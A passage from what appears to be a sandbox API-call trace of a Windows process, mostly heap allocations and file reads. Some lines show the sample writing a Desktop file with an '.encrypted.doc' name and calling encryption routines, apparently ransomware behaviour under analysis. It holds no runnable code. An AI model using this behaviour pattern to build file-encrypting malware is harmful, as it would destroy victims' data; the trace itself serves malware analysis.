lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\haqrv lvwyhv.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.116] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.117] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.117] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.117] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.118] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0031.120] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x396e, lpOverlapped=0x0) returned 1 [0031.120] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1396e) returned 0x88ffb0 [0031.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1396e) returned 0x8a3928 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1396e) returned 0x88ffb0 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.124] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1396e) returned 0x88ffb0 [0031.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0031.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1396e) returned 0x8b72a0 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.127] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.127] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.127] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.128] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.128] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.129] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.130] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 